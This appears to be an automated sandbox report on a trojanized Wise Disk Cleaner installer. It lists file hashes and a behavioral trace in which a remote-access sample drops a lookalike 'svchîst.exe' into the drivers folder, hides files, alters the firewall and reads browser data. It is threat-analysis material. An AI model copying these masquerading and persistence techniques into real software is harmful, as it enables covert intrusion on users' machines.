| SHA256 | 5c891ead72b187252daf3de22075a9c0e7f967e3050aec97db6f019d59bec138 |
| SHA512 | b691de0ac4254a29a6dd87fdfa5973c4b8c11719304ed665d6db661df66d7a1693e15514477979e24eabcd48fe9287fe07a123da6a469ef5dad07cf43d531021 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\German.ini
| MD5 | 12aa09156da6482c24a1b2d4b55d855c |
| SHA1 | 1c2dad1b7d7beeb65710da2efafe36688754000e |
| SHA256 | 2fd313688b2ad99a3a4be590b5b96f4932cdecf5211771b84f2d060b00a3893e |
| SHA512 | 0742e6ab784dc765dcd13f0551883bad341b254cb993a8a6016ffbd18846109bbb6f00611dfde797db8382e014805c6e2a8ac38c50c827054af9ac7447e511dd |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\French.ini
| MD5 | 3ec80eda36af3cae27ad0bc179efe392 |
| SHA1 | 42924e65a3b9bef333b9f546343cf30d6fe25d71 |
| SHA256 | 0c05485c08fc6877eae77afa6d38623360c16aadf9b6ad0271079854b6d8b83e |
| SHA512 | 6f5a1c499adb8d8fd20b29293a8b91e942de6945df1df0185d7e2e71ed48ea917f38b785f206f0d6065b6ae4a5b85f38e8275315e86679d4def32f35d1351cb4 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Finnish.ini
| MD5 | dc73d7da4015500c369caacb8ef26e21 |
| SHA1 | c33246680111d1fc3fb3cdac10dd7c37f9f05a33 |
| SHA256 | d70edac364dd4273a80e40e5d3a710198576b1cfd81e3cec0bfb4d4683dd50fb |
| SHA512 | 0f4f0a50f3dd36999864669f078d686b5af04cfb750951c9abe2cdbb609c683e447fd56ac28a34d4a83e53444c12d13cc742bcc9bd3236ba6e363dfbcecbf3f8 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\English.ini
| MD5 | dfb897952f03b002a95ef8f47a98afe5 |
| SHA1 | cd9801955ea04a949175cbb8a3972488ef15e966 |
| SHA256 | 86da3520698f44289c789b1d4771929edc36f5dd36c6ba54e1382a06a39c7684 |
| SHA512 | 8536477f154d0687e0c6673b553a27c1f2ef2b38231162e31ab4039db0d772d5d652518f15ddddbf74f981345307eef175321ae262514b06506b18823e0dc5ba |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Dutch (Nederlands).ini
| MD5 | 8e2dedf7ad4959dcba5aad9221755ac1 |
| SHA1 | 1e47e115dc2fb5cc2e27d1ab2726b85409c8338b |
| SHA256 | 32f54c23c8760205d74885992cd8e11fd23911b44660078e1ee11e01af3f4106 |
| SHA512 | b932acbbd885fe68dc6ab31386bf3a9d6523ef7e3063c922cf77ac90ec147f7df1c087bcd067f8677abfb3b134f161035f7116c25ba544d93461e372f8e93a37 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Danish.ini
| MD5 | 3ca37cef05d366f1e10a49a6dde3225a |
| SHA1 | 2734b737b07ffdcdf7bd410b29e3030c94482dfe |
| SHA256 | 0714b1684aa7d1cab8978138754bcf712b43162e45e48c74aab1d588907d2a46 |
| SHA512 | e7d1aad57bb919f192427afe3558dc1c4467d82378b742a82da40ef430db5b8aa41aaec562bbc71ef36731d0800b113e1e38e861f9967904e07f6d4a64a01974 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Czech.ini
| MD5 | a1800a0b75aaf75089172dce6d9cbcba |
| SHA1 | 6eb1245d876ebfd253c77df807acfae0b6c72eed |
| SHA256 | 10d4accda03a1fb836d02eaab186054b49acb1630edd0a07c8d2653234266b1d |
| SHA512 | 6262cd53a2993d985e2c440a45a872a43cc9de8df380bbbf861df3748243c3768f85adf4db6e18ba148cd2d0ae3c6eb7d77f822c8015364d94114141d605a917 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Chinese(Traditional).ini
| MD5 | 3b2fe60c4ace1c7733549c1e892622fa |
| SHA1 | 5903fa94e31186df51bf520add0542153c963a71 |
| SHA256 | c983c82379b6dc354f7dc4fb37e5ee147069c1141503df4a1efa22884969a69f |
| SHA512 | ebf3e1ef1354916d9cd3f4ba7f9c2a175e6b9d162e4380a69f551926c132079494b67ff3defaace968659dde396cb3e0a191c4bdea9ac6dde7349c563c1756ab |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Chinese(Simplified).ini
| MD5 | ddb1e3858ba84d18e832bf926f71b8d3 |
| SHA1 | ff7af2ab8f8a9b21895e260055df79b10b1e3da2 |
| SHA256 | ac03ab706d80d0175939940091df58543eb885a5cc939e7dfa72a12dfe0a680e |
| SHA512 | b4b8da9b1b3b363e4e614a1ba52b926d785056011f2927febad29680df22225ded628141bff4b3bb9e9d11a77b88db5b44ef8955142ecb599f2891a09077fb23 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Catalan(Spain).ini
| MD5 | e06f62dcb6360c54d0c99e58f7108a1b |
| SHA1 | 60d47951f1cb0fff9abcccfdbd297337e5435130 |
| SHA256 | 7efcb6193c689aab517532b3a7dde3fbce7e42c6060fb698844458aaeae6656b |
| SHA512 | fa6d8726032afa24926e374d8496d73a61776cda53d735a980a87b1aaf2db160ec7a8243bf9e6c034d18218a2f1222d256f820c059c77647648456432682078e |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Bulgarian.ini
| MD5 | 8db61046f722c6feddf6e9ff36395cb1 |
| SHA1 | 32a99cfa048b1bdfa2a27d8618ebcbea98ef31ac |
| SHA256 | 65fedfe3cf7024a0345345e7973f67f0c6b8b0f548dcdca5c4f48c0b667d22e8 |
| SHA512 | a34408d86ad01faf8d7a5b651210943b4e8d5d3c4226eb4c082e5c7c346611015fa9139c3774d365df70d0d146a4a7c49fb1ff8ee04d668c3129d8c49a3bd207 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Belarusian(Latin).ini
| MD5 | 09acc2789101dbef07ab7e1c6be7ace6 |
| SHA1 | 7a55791699490fc7b23fb51fd1b5f0f322a05447 |
| SHA256 | 2007a5a9dbac09656e761b04448e53dd094ec30355f6394204158648d89131d4 |
| SHA512 | ad5071fb49485dc2a8a7d1ab2f7471b90d403b733bce3bf5cffdf017915cf89c719a0d63b6c22d7fe934dcb3713c8748e1f9fcaf6891feeb53ddc2d7c51998e5 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Belarusian(Cyrillic).ini
| MD5 | 538d04c6d3802d211d59fe34d24b08b2 |
| SHA1 | dd24233a739f0dc681b31d215006b407d4b10395 |
| SHA256 | fd915abe1e9c0deb8e103624eb5f0c4f29ad9506092214da36e4e9ea85add212 |
| SHA512 | 6f759975e4f4c95145ab862190428dbf7cf8ab8e5e32379cc44cb9c1f63c7c87e8263033dced3f55d2ef7e61212f22d3892907f823f1e9029dbc7a776de70e31 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Arabic.ini
| MD5 | 3e543da6bcc0ee84d53d88438fafc799 |
| SHA1 | c86b179b803d37852e73a6145c135431b4d52d74 |
| SHA256 | 586419de24beb7faee4a142ee0b5b78c35ff9b7ae4e4a7cc50fb1e2bf082f98c |
| SHA512 | 3a3cedfdbc40e9a2458f1117d08e034881c4ff8ed090bdb2f40f095ee53ec7a4d23dc83fd3ce1fea5939fe43cf31419fcbff799a88ef078e60dae9b6035d0640 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Norwegian (Nynorsk).ini
| MD5 | d82a2f11ab17c1fdc94e8aca732bfdc6 |
| SHA1 | 58347d500fa9efaf46b600345f9752f426e99b45 |
| SHA256 | 6e9385096f433f4a4d95997d0483ab08695b6b7cf2c9f1f525cf41b83c85459c |
| SHA512 | 61f6ddad161a8e0df43b60e424fbd83e0d759f1bedfcfd5268c803f98d98ba4006b1c2f9f2b63b3a3461401fdbf16dec2cd07d8fac15af7eb61fd5b79a564343 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Norwegian (Bokmal).ini
| MD5 | 5d95e5077b31764d3d91ace0ea64490f |
| SHA1 | 12bcc6fd0e6fa8c7109cc4cf19033a0c3cd8fadd |
| SHA256 | 73721487c7680b844e73079cc57acc6988622506230f73929c63ef197d19c83e |
| SHA512 | f22e764a002e835a51fc4db17320c96241e949f6b437c1f699714e41ca759f096a99c61cc82b773198f962170322cadbd4a5f943550ad7b4355d48cf05915bcc |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Nepali.ini
| MD5 | 8e9d6867bb1b047e0e7eecf8a7ab4151 |
| SHA1 | 269c9258fed0552758c75897ed8346e7e8c4eb2b |
| SHA256 | 44c210cf753a79acba19b171fe4643056dee29d441ccf91fa6121b7e441cd2ea |
| SHA512 | 817e7016dd68f6402029c1f8fa49ac2edd8d114f06ac5a8c1b68b39e77279d6e68ec49a575da950e1c9d686488195bebb95d0997bf3123bfe54dfffcea689183 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Korean.ini
| MD5 | 8f674280944a449f943689e19ad0ced2 |
| SHA1 | 90c7d3972bb418eecb2696e2e7390df2c0a33a7d |
| SHA256 | a2223c96dc9fced161469aa2989db97ba0e9393dc86cbdc7aa06d4342772a000 |
| SHA512 | 6b788b826af729a2217d6b5d72bdaf4ab9682e6cd71331d1c5da4384fc25a4b4d9f2b44d776b65a8ade2d589ce55baa7e00f11a9d53a36fa79ce5943f843df65 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Japanese.ini
| MD5 | 7792786223200e5da40d9c542a7f4b8b |
| SHA1 | b71f45389d66dfb56303a81547aafcd3bfbe869a |
| SHA256 | a62a2aaf6e39e46a9cb0053a670d09dcb4aaf9142f89a7b12daad1793154db9a |
| SHA512 | 2a3d66677eeeea065392d27546bc2fba5e115f906cd1dc4398dd848f104a9d5cf98d2dfec8daa432ad94ee6f93bd45d5f300c0c6801bbfadb073639b3f5f32e7 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Italian.ini
| MD5 | 4b9f92249266356fea5844eccdc6e6f1 |
| SHA1 | 0a060c8d39e98fbda3411b8b915a83754af54089 |
| SHA256 | 1a2f241b503be86067d89a8fcb69bdffcccec96912a765337dfadcce6bca75b0 |
| SHA512 | 8ab4323d596a71d1cbc9492b48eb6f6996ddd0411edd6732417b68dd27d1acb2f00c17865ce7a17dac58947dd7482771c11c8fc5c2b73561a47469641fe9a82a |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Indonesian.ini
| MD5 | 0a763d65adccbe593039ccdcfde7b499 |
| SHA1 | 833c56164a17b152d4098ee95fd4bb6912193a89 |
| SHA256 | 759b0029fc140d49cb40bcd197fc64537fe408cd78641d0cecafac599aa97d10 |
| SHA512 | b83d88ce225621e0460d40c8c9ad92e91ffe1c0b3875270ff8ed8aa66a7b3a08c6605e6f4e7b7bf5d02b9ea2ab7256dff07f2bf31232d2675de869d06bfc9d7e |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Hungarian.ini
| MD5 | b967b7a48eca3f5076033759089e4142 |
| SHA1 | 9e29f54c07066608be1cb6abc59cf7cda823cc03 |
| SHA256 | 1ecce57dbf90759fcfefbea163521dfb8d3281a98c216d94ec51771308cf32dd |
| SHA512 | 4a588f3150e21d1b7923fc885ab28f36a40488157f583de9558476d04a2ceb5fa3d0f91ba09d12aacee1a0a8d5797c4be6e15ba01e6a01427e1de88845bd04cb |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Hebrew.ini
| MD5 | 75009c9455e68643ac2e2301b8af20e2 |
| SHA1 | 3091a33bb6517115b38f4eb3cad3747f3b64569c |
| SHA256 | 05746a60b31c255eaf1ea903c5ad47f3e25d98633472cee165acbec3521c64a8 |
| SHA512 | 18619921ab3bcf481466960f1cab10b2185be93470ee9b6cd01377b523ea8810e6d159a4515a0cfa575df3617f47fc5cee7d5982cc2deff0fa8a69644e7a0eb8 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Spanish (Colombia).ini
| MD5 | ae51cebbeb929ca8ef00abdee0554352 |
| SHA1 | e245b0ece229b9d1a2109fb48e1533f0f7dcc490 |
| SHA256 | 9cb9b5580e4706168c02b07f3ef6656ebd2f6d9661cccd75b089a465d5ac0565 |
| SHA512 | c617871237592bfe3bcd1ac4e3b41ef4157b0b6cbcb636fe0d56f8ea59c198fc4551b6b86f1497778f3c4db06fb8e89169e5ac0e9662532d4c6f0f0b944a3ea1 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Slovenian.ini
| MD5 | 204fe6fcde25232628a4d7b34e6b87fd |
| SHA1 | 613efc64843467bd90ec64949367f2139f4b581e |
| SHA256 | 4940b086c467d2ee6fd232f787bf03382c8328f2ce71c7ca747c02a7a368c1de |
| SHA512 | 88af2f2bff0fb8daa60c048cef6008bafdb636970b30da4765cf6ee2f62604e1581a3ce822555a14d018a7f10d0d2da2e072d58b12be4f27200dcdf20890b726 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Slovak.ini
| MD5 | 5108c5d28c126216a792f4a0900847fa |
| SHA1 | 9a8b3e565e37e1bf717d3e1c7ebca12e414328f5 |
| SHA256 | 3860ad448ebd501be377fbd46c65cb4e7aecc809900d5f085ee5223931425695 |
| SHA512 | ce241b74f7903131fd0af070cc75a29d01e375e5d05636814fa123c1edfdb0304863f997fb3fcb3467bf87b770f8412acf67a29480b96877e8d4fd0888b39438 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Serbian.ini
| MD5 | d5de1a134aab351dcd5b8f22f32ec30a |
| SHA1 | 45404143905dcb284e99acd78285a3ba86a1c1a6 |
| SHA256 | 2a2338c828fd426a6d50e4866ed1c59ccd292b877cf66374c57a8826b30c9aa1 |
| SHA512 | 7727f4c9902daae600e48a950afd61ba2e26d8a943f20bbfc2ec7eaf01f1de2a8b9d04e4fd4ec9b38cf700c6df00d58c714f1208e60383755ad5220715912427 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Russian.ini
| MD5 | 479bfcd4c6e0a91bce8eeb3d5282902a |
| SHA1 | a73b34daca2a27e159a7f14148423bd0e8877287 |
| SHA256 | b326491b5a4245e9b3a436cfe1b023d88b35cdbbb50368bbac5f7d1f19560718 |
| SHA512 | 8c799a763cae7bdd33ff8d9a3295b2b92f87413bdb46e590c02255aedbd32707faf5d5badfc884cddeeb8be4772c2f824d16af3996e5ecb0692a2399594121f0 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Romanian.ini
| MD5 | e56f223aea3e1d394c31b93f17054cb7 |
| SHA1 | 9fe9ca1dc70cd7e0b2264842139a364ac4a8e689 |
| SHA256 | 865b6284291dba5b148d236f0ebfd3aebf0998dabfe36cc3a013658af1733dcc |
| SHA512 | 21050172c652bbcc93ab409d16aaef330a713d8dcf33b5f84ea323832b3489bddcb98ec552d00e48afd894e1f935a0fdc22749ee018f8d46d407559a0137eeed |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Portuguese(Portugal).ini
| MD5 | 66ccf14a92b6354bed01867615a76d90 |
| SHA1 | 7f133285713146b2e343d44c0de190fac75e40f6 |
| SHA256 | a3af006e4957a14abd637e50cf265ecba049ca53ff716ec0298c96a0265a2f9e |
| SHA512 | c43f521781d59a150a124d6105d295dbfb5ac6dee0401b9c927eeda8ba0a8df21d1e69fdf8dc090314f3945b97dc72a9cd3ba9aed34bbb8f9ae96fdcb96ca784 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Portuguese(Brasil).ini
| MD5 | 3445d1277329541b11ddb2b1b5dc54f5 |
| SHA1 | 57fac60be3e79eb01d4170df6abbb44dc62c21e6 |
| SHA256 | c34cf5c5773429d9c1273bdeebaf59fc0f7984db541f6524d2c1718c191aeed2 |
| SHA512 | 2b0080337609bd458677532371a9226b9112edc9a1c8a6567423fd324559338c934ae409a012a903ca6f464281c327a812aefe932395d9e739ef8f0e379ebf28 |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Polish.ini
| MD5 | 1a59560e88582dac1e5b7a70a38463a5 |
| SHA1 | fe80e956dbf54bd066f2f11d697072377dd3df6b |
| SHA256 | b826a3a9198323ce5b29ba96a311a632b98c05fbf4d02213abd30ce0ea262427 |
| SHA512 | 0d00273db68c3ebb58f0be6102b1f23d2096197aacaa8577aa42473aa1b587f50c86f333c1831b78879b2ba5ab1793488af1f875ed111eb800a1b2c9becdf69e |
C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\Persian.ini
| MD5 | 71f1fe9e66926028a09b7a5ff36ec42a |
| SHA1 | 521a99b288ae887391c36fb86555e25df5685164 |
| SHA256 | 8044110a96bbe6dcc5cc74fa8106a2ed250536ea8785b0eb1148a696c74c5353 |
| SHA512 | 62c8b5c0eda2163d7093da06a176270558f377d0e7fc8fd2aea137045c5fdc4cf62be47fc2c215e2bf4d68ba8eb343ceb70bce1b991502ecd1407350dab086c5 |
memory/1516-161-0x0000000000000000-mapping.dmp
memory/1552-163-0x0000000000000000-mapping.dmp
memory/1936-168-0x0000000000000000-mapping.dmp
memory/756-169-0x0000000000000000-mapping.dmp
memory/972-167-0x0000000000000000-mapping.dmp
memory/1352-166-0x0000000000000000-mapping.dmp
memory/1664-170-0x0000000000000000-mapping.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-04-17 07:06
Reported
2022-04-17 07:08
Platform
win10v2004-20220414-en
Max time kernel
152s
Max time network
161s
Command Line
Signatures
RMS
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\drivers\ssleay32.dll | C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\libeay32.dll | C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\svchîst.exe | C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\svchîst.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\install.exe | C:\Windows\SysWOW64\attrib.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\drivers\install.exe | C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Wise Disk Cleaner\10.3.6.788\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-RO3QC.tmp\CSTask.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
Modifies Windows Firewall
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\63119ab29e258e4828893f60f39cf278e2a4e69fd1886ee71e14b98091b4d443.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\drivers\install.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\drivers\svchîst.exe | N/A |
Reads user/profile data of web browsers
Checks for any installed AV software in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\software\avira\antivir desktop | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key opened | \REGISTRY\MACHINE\software\WOW6432Node\avira\antivir desktop | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\software\avira\antivirus | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key opened | \REGISTRY\MACHINE\software\avast software\avast | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key opened | \REGISTRY\MACHINE\software\WOW6432Node\avast software\avast | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\software\avast software\avast | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | N/A |
Checks installed software on the system
Enumerates connected drives
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\idfgvgjnghcdfb.reg | C:\Windows\SysWOW64\attrib.exe | N/A |
| File created | C:\Windows\SysWOW64\idfgvgjnghcdfb.reg | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\unins000.dat | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-0U0TI.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-GIIEQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-UDKEJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-MREEQ.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-8DFJB.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-GMTI7.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-N51AI.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-GSJ0B.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-3AQ20.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-14VKG.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-4HH0U.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-BNU1O.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-GK4R7.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\sqlite3.dll | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-8EFVN.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-P4SP7.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-BP6IL.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-MLER0.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-9TT3J.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-IGT7O.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-E2B0R.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDefrag.dll | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-DHCCJ.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-MD2O1.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-JH35S.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-M4OGA.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\is-M4CQV.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-K6VJF.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-2VUGG.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-49TVG.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File created | C:\Program Files (x86)\Wise\Wise Disk Cleaner\Languages\is-FH5O6.tmp | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WiseDiskCleaner.exe | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\WJSLib.dll | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
| File opened for modification | C:\Program Files (x86)\Wise\Wise Disk Cleaner\LiveUpdate.exe | C:\Users\Admin\AppData\Local\Temp\is-TD35V.tmp\setup.tmp | N/A |
